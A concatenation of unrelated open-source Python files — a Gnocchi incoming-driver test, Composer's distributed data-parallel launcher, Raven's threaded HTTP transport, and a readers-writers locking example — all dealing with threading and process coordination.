# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import threading
import uuid
import numpy
from gnocchi import incoming
from gnocchi import indexer
from gnocchi.tests import base as tests_base
class TestIncomingDriver(tests_base.TestCase):
def setUp(self):
super(TestIncomingDriver, self).setUp()
# A lot of tests wants a metric, create one
self.metric = indexer.Metric(
uuid.uuid4(),
self.archive_policies["low"])
def test_iter_on_sacks_to_process(self):
if (self.incoming.iter_on_sacks_to_process ==
incoming.IncomingDriver.iter_on_sacks_to_process):
self.skipTest("Incoming driver does not implement "
"iter_on_sacks_to_process")
found = threading.Event()
sack_to_find = self.incoming.sack_for_metric(self.metric.id)
def _iter_on_sacks_to_process():
for sack in self.incoming.iter_on_sacks_to_process():
self.assertIsInstance(sack, incoming.Sack)
if sack == sack_to_find:
found.set()
break
finder = threading.Thread(target=_iter_on_sacks_to_process)
finder.daemon = True
finder.start()
# Try for 30s to get a notification about this sack
for _ in range(30):
if found.wait(timeout=1):
break
# NOTE(jd) Retry to send measures. It cannot be done only once as
# there might be a race condition between the threads
self.incoming.finish_sack_processing(sack_to_find)
self.incoming.add_measures(self.metric.id, [
incoming.Measure(numpy.datetime64("2014-01-01 12:00:01"), 69),
])
else:
self.fail("Notification for metric not received")
|
ddp.py | # Copyright 2021 MosaicML. All Rights Reserved.
from __future__ import annotations
import collections.abc
import datetime
import logging
import os
import signal
import subprocess
import sys
import tempfile
import time
import warnings
from abc import ABC, abstractmethod
from contextlib import contextmanager, nullcontext
from dataclasses import dataclass
from threading import Thread
from typing import Callable, ContextManager, Iterator, List, Optional, Sequence, Set, TypeVar, Union, cast
import torch
import torch.distributed
import torch.utils.data
import yahp as hp
from torch.nn.parallel import DistributedDataParallel
from torch.utils.data.distributed import DistributedSampler
from composer.core.state import State
from composer.core.types import Batch, DataLoader, Model, Tensor
from composer.datasets import DataloaderHparams, DataloaderSpec, WrappedDataLoader
from composer.utils.iter_helpers import ensure_tuple
from composer.utils.string_enum import StringEnum
logger = logging.getLogger(__name__)
TObj = TypeVar("TObj")
CLEANUP_TIMEOUT = datetime.timedelta(seconds=5)
class DataloaderMultipleIterationWarning(Warning):
pass
class DDPDataLoader(WrappedDataLoader):
"""Ensure sampler.set_epoch() is called after each iteration.
DDPDataLoader wraps a dataloader and a distributed sampler and is
called after each iteration (epoch) through the dataset.
See: https://pytorch.org/docs/stable/data.html#torch.utils.data.distributed.DistributedSampler
"""
def __init__(self, dataloader: DataLoader) -> None:
super().__init__(dataloader)
if not isinstance(self.dataloader.sampler, DistributedSampler):
raise ValueError("When using the DDP data loader, the sampler must be a DistributedSampler")
self._iterator: Optional[Iterator[Batch]] = None
def __iter__(self) -> DDPDataLoader:
if self._iterator is not None:
warnings.warn(
"The dataloader detected the start of a new iteration before the previous iteration finished. "
"The dataloader is skipping ahead to the start of the next epoch. "
"Multiple simultaneous iterations through the DDP dataloader prohibited, since "
"it automatically tracks the current epoch.",
category=DataloaderMultipleIterationWarning)
assert isinstance(self.sampler, DistributedSampler)
self.sampler.set_epoch(epoch=self.sampler.epoch + 1)
self._iterator = iter(self.dataloader)
return self
def __next__(self) -> Batch:
assert self._iterator is not None
try:
return next(self._iterator)
except StopIteration:
self._iterator = None
assert isinstance(self.sampler, DistributedSampler)
self.sampler.set_epoch(epoch=self.sampler.epoch + 1)
raise
class DDPSyncStrategy(StringEnum):
"""How and when DDP gradient synchronization should happen.
Attributes:
SINGLE_AUTO_SYNC: The default behavior for DDP. Gradients are synchronized as they
computed, for only the final microbatch of a batch. This is the most efficient
strategy, but can lead to errors when ``find_unused_parameters`` is set, since
it is possible different microbatches may use different sets of parameters,
leading to an incomplete sync.
MULTI_AUTO_SYNC: The default behavior for DDP when ``find_unused_parameters`` is set.
Gradients are synchronized as they are computed for all microbatches. This ensures
complete synchronization, but is less efficient than :attr:`SINGLE_AUTO_SYNC`. This
efficiency gap is usually small, as long as either DDP syncs are a small portion
of the trainer's overall runtime, or the number of microbatches per batch is
relatively small.
FORCED_SYNC: Gradients are manually synchronized only after all gradients have been
computed for the final microbatch of a batch. Like :attr:`MULTI_AUTO_SYNC`, this
strategy ensures complete gradient synchronization, but this tends to be slower than
:attr:`MULTI_AUTO_SYNC`. This is because ordinarily syncs can happen in parallel
with the ``loss.backward()`` computation, meaning syncs can be mostly complete by
the time that function finishes. However, in certain circumstances, syncs may take
a very long time to complete - if there are also a lot of microbatches per batch,
this strategy may be optimal.
"""
SINGLE_AUTO_SYNC = "single_auto_sync"
MULTI_AUTO_SYNC = "multi_auto_sync"
FORCED_SYNC = "forced_sync"
class DDP:
def __init__(self,
*,
nproc_per_node: int,
store_hparams: StoreHparams,
node_rank: int,
num_nodes: int,
backend: str,
fork_rank_0: bool,
timeout: float = 5,
find_unused_parameters: bool = False,
ddp_sync_strategy: Optional[Union[str, DDPSyncStrategy]] = None):
self.hparams = DDPHparams(
store=store_hparams,
node_rank=node_rank,
num_nodes=num_nodes,
fork_rank_0=fork_rank_0,
timeout=timeout,
)
self.nproc_per_node = nproc_per_node
self.backend = backend
self.processes: List[subprocess.Popen[str]] = []
self.killed_pids: Set[int] = set() # track which pids have been killed
self.find_unused_parameters = find_unused_parameters
if ddp_sync_strategy is None:
self.ddp_sync_strategy = DDPSyncStrategy.SINGLE_AUTO_SYNC if not find_unused_parameters else DDPSyncStrategy.FORCED_SYNC
else:
self.ddp_sync_strategy = DDPSyncStrategy(ddp_sync_strategy)
if backend == 'nccl':
if not torch.cuda.is_available():
raise ValueError('CUDA not available but gpu backend requested.')
if torch.cuda.device_count() < nproc_per_node:
raise ValueError(f'Requested {nproc_per_node} GPUs, but '\
f'only {torch.cuda.device_count()} available.')
if not torch.distributed.is_nccl_available():
raise ValueError('Requested NCCL backend not available in torch.distributed')
@property
def world_size(self) -> int:
return self.hparams.num_nodes * self.nproc_per_node
def barrier(self) -> None:
if torch.distributed.is_available():
torch.distributed.barrier()
# If not on DDP, then do nothing
def all_reduce(
self,
tensor: torch.Tensor,
reduce_operation: str = "SUM",
) -> None:
if torch.distributed.is_available():
reduce_op = getattr(torch.distributed.ReduceOp, reduce_operation.upper())
torch.distributed.all_reduce(tensor, op=reduce_op)
else:
raise NotImplementedError("Non-DDP versions of reduce operations are not yet implemented")
def all_gather(self, tensor: torch.Tensor) -> Sequence[Tensor]:
"""gather_to_rank_zero collects a tensor from each rank, and returns a sequence of tensors indexed by rank
Args:
tensor (torch.Tensor): tensor from each rank to be gathered
Returns:
Sequence[Tensor]: A sequence of tensors indexed by rank
"""
if torch.distributed.is_available():
obj_gather_list = [torch.zeros_like(tensor) for _ in range(self.world_size)]
torch.distributed.all_gather(obj_gather_list, tensor)
return obj_gather_list
else:
return [tensor]
def all_gather_object(self, obj: TObj) -> List[TObj]:
"""gather_object_to_rank_zero collects a pickleable object from each rank, and returns a list of
these objects indexed by rank
Args:
obj (TObj): Object to be gathered
Returns:
List[TObj]: A list of objects indexed by rank
"""
if torch.distributed.is_available():
obj_gather_list = [None for _ in range(self.world_size)]
torch.distributed.all_gather_object(obj_gather_list, obj)
# torch.distributed will replace the None's in obj_gather_list with the gathered objects on rank 0
# or will just be None on non-rank-0
return cast(List[TObj], obj_gather_list)
else:
return [obj]
def launch(self, state: State, loop: Callable[[], None]):
if os.environ.get("RANK") is None:
os.environ["WORLD_SIZE"] = str(self.world_size)
logger.info("Starting DDP on node_rank(%d) with world_size(%d)", self.hparams.node_rank, self.world_size)
if torch.distributed.is_available():
# Adapted from torch.distributed.launch
# set PyTorch distributed related environmental variables
current_env = os.environ.copy()
# TODO omp num threads -- this parameter needs to be auto-tuned
for local_rank in range(self.nproc_per_node):
# each process's rank
global_rank = self.nproc_per_node * self.hparams.node_rank + local_rank
current_env["RANK"] = str(global_rank)
if local_rank == 0 and not self.hparams.fork_rank_0:
os.environ["RANK"] = str(global_rank)
else:
logger.info("Launching process for global_rank(%d) on node_rank(%d)", global_rank,
self.hparams.node_rank)
# spawn the processes
cmd = [
sys.executable,
"-u",
*sys.argv,
]
if local_rank == 0:
# Attaching rank 0 to the main stdout/stderr so interactive
# terminal output will work without issue (e.g. tqdm)
process = subprocess.Popen(cmd, env=current_env, text=True)
else:
# Other processes, except in the case of an error, should not print anything
process = subprocess.Popen(
cmd,
env=current_env,
stdout=tempfile.TemporaryFile(),
stderr=tempfile.TemporaryFile(),
text=True,
)
self.processes.append(process)
if self.hparams.fork_rank_0:
self.monitor()
return
else:
Thread(target=self.monitor, daemon=True).start()
else:
if self.world_size != 1:
raise ValueError("Must have world size == 1 when torch.distributed is not available")
if self.hparams.node_rank != 0:
raise ValueError("Must have a node_rank == 0 when torch.distributed is not available")
os.environ["RANK"] = "0"
# We are now on the correct process
global_rank = int(os.environ["RANK"])
assert global_rank // self.world_size == self.hparams.node_rank
assert os.environ["WORLD_SIZE"] == str(
self.world_size
), f"os.environ['WORLD_SIZE']({os.environ['WORLD_SIZE']}) != self.world_size({self.world_size})"
is_main = global_rank == 0
if torch.distributed.is_available():
logger.info("Initializing ddp: GLOBAL_RANK: %s, WORLD_SIZE: %s", global_rank, self.world_size)
store = self.hparams.store.initialize_object(is_main, state.world_size)
torch.distributed.init_process_group(self.backend,
rank=global_rank,
world_size=self.world_size,
timeout=datetime.timedelta(seconds=self.hparams.timeout),
store=store)
assert torch.distributed.is_initialized()
assert state.is_rank_set, "state.is_rank_set should be set after torch.distributed is initialized"
assert state.local_rank == global_rank % self.nproc_per_node, "state.local_rank is incorrect"
assert state.nproc_per_node == self.nproc_per_node, "state.nproc_per_node is incorrect"
assert state.global_rank == torch.distributed.get_rank(
), "state.global_rank != torch.distributed.get_rank()"
logger.info("All DDP processes registered. world_size=%s.", self.world_size)
logger.info("Starting process with global_rank=%s", global_rank)
try:
loop()
finally:
self.cleanup()
def prepare_module(self, module: Model) -> Model:
if torch.distributed.is_available():
if any((p.requires_grad for p in module.parameters())):
ddp_model = DistributedDataParallel(module, find_unused_parameters=self.find_unused_parameters)
return cast(Model, ddp_model)
return module
else:
return module
def create_dataloader(self, batch_size: int, dataloader_hparams: DataloaderHparams,
dataloader_spec: DataloaderSpec) -> DataLoader:
if torch.distributed.is_available():
sampler = torch.utils.data.DistributedSampler[int](dataloader_spec.dataset,
drop_last=dataloader_spec.drop_last,
shuffle=dataloader_spec.shuffle)
else:
assert isinstance(dataloader_spec.dataset, collections.abc.Sized)
sampler = torch.utils.data.RandomSampler(dataloader_spec.dataset, generator=dataloader_spec.generator)
dataloader = dataloader_hparams.initialize_object(batch_size, sampler, dataloader_spec)
if torch.distributed.is_available():
dataloader = DDPDataLoader(dataloader)
return dataloader
def monitor(self) -> None:
# Monitor checks whether any subprocesses have died unexpectedly
alive_processes = set(self.processes)
while len(alive_processes) > 0:
finished_processes: List[subprocess.Popen[str]] = []
for process in alive_processes:
if process.poll() is None:
# the process is still running
continue
else:
# return code of 0 implies clean exit
# return code of -9 implies sigkill, presumably from
# cleanup() in the main process
if process.pid in self.killed_pids or process.returncode == 0:
# exited cleanly
finished_processes.append(process)
else:
if process.stdout is None:
output = ""
else:
output = process.stdout.read()
if process.stderr is None:
stderr = ""
else:
stderr = process.stderr.read()
exc = subprocess.CalledProcessError(
process.returncode,
cmd=process.args,
output=output,
stderr=stderr,
)
if self.hparams.fork_rank_0:
raise exc
else:
error_msg = [
"Error in subprocess",
"----------Subprocess STDOUT----------",
exc.output,
"----------Subprocess STDERR----------",
exc.stderr,
]
logger.exception("\n".join(error_msg), exc_info=exc)
sys.exit(process.returncode)
alive_processes = set(alive_processes) - set(finished_processes)
time.sleep(1)
def cleanup(self) -> None:
for process in self.processes:
if process.returncode is None:
logger.info("Killing subprocess %s with SIGTERM", process.pid)
self.killed_pids.add(process.pid)
try:
os.killpg(process.pid, signal.SIGTERM)
except ProcessLookupError:
pass
current_time = datetime.datetime.now()
while datetime.datetime.now() - current_time < CLEANUP_TIMEOUT:
all_finished = all([p.returncode is None for p in self.processes])
if all_finished:
break
time.sleep(0.1)
for process in self.processes:
if process.returncode is None:
logger.error("Failed to kill subprocess %s with SIGTERM, using SIGKILL instead", process.pid)
self.killed_pids.add(process.pid)
try:
os.killpg(process.pid, signal.SIGKILL)
except ProcessLookupError:
pass
if torch.distributed.is_initialized():
torch.distributed.destroy_process_group()
@contextmanager
def ddp_sync_context(self, state: State, is_final_microbatch: bool):
assert isinstance(state.model, DistributedDataParallel), "state.model is not wrapped by DDP"
assert state.optimizers is not None, "optimizers have not been initialized"
no_sync_context = cast(Callable[[], ContextManager], state.model.no_sync)
auto_sync_context = nullcontext
if self.ddp_sync_strategy == DDPSyncStrategy.SINGLE_AUTO_SYNC:
context = auto_sync_context if is_final_microbatch else no_sync_context
with context():
yield
elif self.ddp_sync_strategy == DDPSyncStrategy.MULTI_AUTO_SYNC:
with auto_sync_context():
yield
elif self.ddp_sync_strategy == DDPSyncStrategy.FORCED_SYNC:
try:
with no_sync_context():
yield
finally:
if is_final_microbatch:
for optimizer in ensure_tuple(state.optimizers):
for group in optimizer.param_groups:
for p in group["params"]:
if p.grad is not None:
self.all_reduce(p.grad)
p.grad = p.grad / state.world_size
else:
raise ValueError("Unknown sync strategy", self.ddp_sync_strategy)
@dataclass
class StoreHparams(hp.Hparams, ABC):
@abstractmethod
def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
pass
@dataclass
class TCPStoreHparams(StoreHparams):
host_name: str = hp.optional(doc="Rank 0 address", default="127.0.0.1")
port: int = hp.optional(doc="Rank 0 port", default=43297)
def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
return torch.distributed.TCPStore(self.host_name, self.port, world_size, is_main)
@dataclass
class FileStoreHparams(StoreHparams):
file_name: str = hp.required(doc="Path to store file")
def initialize_object(self, is_main: bool, world_size: int) -> torch.distributed.Store:
return torch.distributed.FileStore(self.file_name, world_size)
@dataclass
class DDPHparams(hp.Hparams):
hparams_registry = {
"store": {
"tcp": TCPStoreHparams,
"file": FileStoreHparams,
}
}
store: StoreHparams = hp.optional(doc="Store", default_factory=TCPStoreHparams)
node_rank: int = hp.optional(doc="Node ID for multi-node training", default=0)
num_nodes: int = hp.optional(doc="Number of nodes used for training", default=1)
fork_rank_0: bool = hp.optional(
doc="Whether to fork the local rank 0 process, or use the existing process for rank 0 training.",
default=False,
)
timeout: float = hp.optional(doc="Timeout, in seconds, for initializing the DDP process group.", default=5.0)
def initialize_object(self, nproc_per_node: int, backend: str, find_unused_parameters: bool) -> DDP:
return DDP(
backend=backend,
nproc_per_node=nproc_per_node,
store_hparams=self.store,
node_rank=self.node_rank,
num_nodes=self.num_nodes,
fork_rank_0=self.fork_rank_0,
find_unused_parameters=find_unused_parameters,
timeout=self.timeout,
)
|
threaded.py | """
raven.transport.threaded
~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import atexit
import logging
import time
import threading
import os
from raven.utils.compat import Queue
from raven.transport.base import HTTPTransport, AsyncTransport
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('sentry.errors')
class AsyncWorker(object):
_terminator = object()
def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
self._queue = Queue(-1)
self._lock = threading.Lock()
self._thread = None
self.options = {
'shutdown_timeout': shutdown_timeout,
}
self.start()
def main_thread_terminated(self):
size = self._queue.qsize()
if size:
timeout = self.options['shutdown_timeout']
print("Sentry is attempting to send %s pending error messages" % size)
print("Waiting up to %s seconds" % timeout)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
self.stop(timeout=timeout)
def start(self):
"""
Starts the task thread.
"""
self._lock.acquire()
try:
if not self._thread:
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(self.main_thread_terminated)
def stop(self, timeout=None):
"""
Stops the task thread. Synchronous!
"""
self._lock.acquire()
try:
if self._thread:
self._queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def queue(self, callback, *args, **kwargs):
self._queue.put_nowait((callback, args, kwargs))
def _target(self):
while 1:
record = self._queue.get()
if record is self._terminator:
break
callback, args, kwargs = record
try:
callback(*args, **kwargs)
except Exception:
logger.error('Failed processing job', exc_info=True)
time.sleep(0)
class ThreadedHTTPTransport(AsyncTransport, HTTPTransport):
scheme = ['threaded+http', 'threaded+https']
def __init__(self, parsed_url):
super(ThreadedHTTPTransport, self).__init__(parsed_url)
# remove the threaded+ from the protocol, as it is not a real protocol
self._url = self._url.split('+', 1)[-1]
def get_worker(self):
if not hasattr(self, '_worker'):
self._worker = AsyncWorker()
return self._worker
def send_sync(self, data, headers, success_cb, failure_cb):
try:
super(ThreadedHTTPTransport, self).send(data, headers)
except Exception as e:
failure_cb(e)
else:
success_cb()
def async_send(self, data, headers, success_cb, failure_cb):
self.get_worker().queue(self.send_sync, data, headers, success_cb,
failure_cb)
|
example3.py | import threading
def writer():
global text
while True:
with service:
resource.acquire()
print(f'Writing being done by {threading.current_thread().name}.')
text += f'Writing was done by {threading.current_thread().name}. '
resource.release()
def reader():
global rcount
while True:
with service:
rcounter.acquire()
rcount += 1
if rcount == 1:
resource.acquire()
rcounter.release()
print(f'Reading being done by {threading.current_thread().name}:')
#print(text)
with rcounter:
rcount -= 1
if rcount == 0:
resource.release()
text = 'This is some text. '
rcount = 0
rcounter = threading.Lock()
resource = threading.Lock()
service = threading.Lock()
threads = [threading.Thread(target=reader) for i in range(3)] + [threading.Thread(target=writer) for i in range(2)]
for thread in threads:
thread.start()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.